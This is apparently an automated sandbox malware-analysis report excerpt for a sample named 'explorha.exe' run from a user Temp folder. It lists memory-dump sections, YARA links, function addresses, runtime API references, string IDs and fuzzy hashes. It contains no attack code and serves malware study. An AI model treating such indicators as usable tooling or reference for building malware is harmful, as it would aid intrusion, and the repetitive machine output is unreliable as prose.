                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                      • API String ID: 0-3666169776
                                                                                                      • Opcode ID: f879db64b927ee425cadfdc7f74c0513ece16d4a95e55c61b0a5172c5c8e627a
                                                                                                      • Instruction ID: bf98ac0561fc3660db6dc61fe0ab17bfa5222cbd4b491c7a38fbdeb298f83123
                                                                                                      • Opcode Fuzzy Hash: f879db64b927ee425cadfdc7f74c0513ece16d4a95e55c61b0a5172c5c8e627a
                                                                                                      • Instruction Fuzzy Hash: 7521D771600309AF9F25BF698C80D6B779DFF6136871C4535F668D7162EB31EC4086A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00892D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00892DF1
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00892E3C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 3390424672-2046700901
                                                                                                      • Opcode ID: 5121d03760832a9a6cc2c0e7a2f96b686e47c3a209cdf2df44e8d6ef483525f4
                                                                                                      • Instruction ID: a65955259545a89f68621c5ef9d472ba7874717f18703bbca9ae580feda57b1d
                                                                                                      • Opcode Fuzzy Hash: 5121d03760832a9a6cc2c0e7a2f96b686e47c3a209cdf2df44e8d6ef483525f4
                                                                                                      • Instruction Fuzzy Hash: 8511B136A00214ABCF19FF28C8D596D7769FF44360B194069E912EB342DB34ED058BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088CFBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0088CFDE
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088CFF1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 548886458-2046700901
                                                                                                      • Opcode ID: f589d0627edc9ae8490e29efa7473d81fdc3b2e29217fb226cb67d299add3fc9
                                                                                                      • Instruction ID: c50a153443344718aab3f7796d2e45a023f8b0ebcd56126546556f6dcd31fd8e
                                                                                                      • Opcode Fuzzy Hash: f589d0627edc9ae8490e29efa7473d81fdc3b2e29217fb226cb67d299add3fc9
                                                                                                      • Instruction Fuzzy Hash: F2E09235B0020867CE08BBA8E85AC9DB77DFF847107084016F525E7395DB74EE0486A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00884B5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00884B8C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::invalid_argument::invalid_argument
                                                                                                      • String ID: pScheduler$version
                                                                                                      • API String ID: 2141394445-3154422776
                                                                                                      • Opcode ID: e4c76dbdcb773c2728bf00d87c7f15ce1c145a0a95ee075b2796ee4cb2ed1c97
                                                                                                      • Instruction ID: f2e0c5cdea50cb45d708b2986f5215713d67a4d783a9a44bf230e3683a6dcbf8
                                                                                                      • Opcode Fuzzy Hash: e4c76dbdcb773c2728bf00d87c7f15ce1c145a0a95ee075b2796ee4cb2ed1c97
                                                                                                      • Instruction Fuzzy Hash: 0DE08635540308B6CF25FAA8D84AFDC7778FF10369F148121B424E129597B8D688C782
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%